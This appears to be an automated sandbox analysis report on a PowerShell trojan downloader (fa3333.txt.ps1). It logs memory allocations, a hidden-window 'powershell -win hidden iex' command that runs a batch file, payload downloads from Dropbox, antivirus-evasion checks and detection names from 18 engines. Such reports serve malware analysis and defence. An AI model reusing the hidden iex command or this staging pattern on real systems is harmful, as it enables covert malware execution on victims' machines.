NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05616000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05618000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05619000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02841000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vi595e.bat'"

Looks up the Dropbox cloud service (1 event)

domain

dl.dropboxusercontent.com

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 5, 2023, 5:15 p.m.	thread_identifier: 2228 thread_handle: 0x000004fc process_identifier: 2224 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vi595e.bat'" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000004f8	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 5, 2023, 5:15 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	\|xd¥&Ö¥ºF]3aøÞn±Á²o´Û½Ðèö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xd¥&!CÉÉ6#7û£\|-q±_ýeÜZieÈ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xd¥&ªIúeþÐ§×7ÌVF2R1Ö3ÿü/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xd¥&²`LD¾úà©Ñ§Ssªªªx»9# 3@÷/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 5, 2023, 5:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Deletes executed files from disk (1 event)

file	C:\Users\Public\ec4h.bat

Drops a binary and executes it (1 event)

file	C:\Users\Public\ec4h.bat

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Sangfor	Trojan.Generic-Script.Save.fd74a0e6
Arcabit	Trojan.Agent.GBLD
ESET-NOD32	PowerShell/TrojanDownloader.Agent.FWQ
Avast	Script:SNH-gen [Drp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Trojan.Agent.GBLD
MicroWorld-eScan	Trojan.Agent.GBLD
F-Secure	Trojan.TR/PShell.Dldr.VPA
VIPRE	Trojan.Agent.GBLD
FireEye	Trojan.Agent.GBLD
Emsisoft	Trojan.Agent.GBLD (B)
Avira	TR/PShell.Dldr.VPA
MAX	malware (ai score=80)
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	Trojan.Agent.GBLD
ALYac	Trojan.Agent.GBLD
AVG	Script:SNH-gen [Drp]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send July 5, 2023, 5:15 p.m.	buffer: \|xd¥&Ö¥ºF]3aøÞn±Á²o´Û½Ðèö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1592 sent: 129	1	129
send July 5, 2023, 5:15 p.m.	buffer: \|xd¥&!CÉÉ6#7û£\|-q±_ýeÜZieÈ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 1592 sent: 129	1	129
send July 5, 2023, 5:15 p.m.	buffer: \|xd¥&ªIúeþÐ§×7ÌVF2R1Ö3ÿü/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 868 sent: 129	1	129
send July 5, 2023, 5:15 p.m.	buffer: \|xd¥&²`LD¾úà©Ñ§Ssªªªx»9# 3@÷/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com socket: 868 sent: 129	1	129

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\Public\ec4h.bat
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\DKM029887273.pdf
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vi595e.bat'"

Creates a suspicious Powershell process (1 event)

option

-win hidden

value

Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

fa3333.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All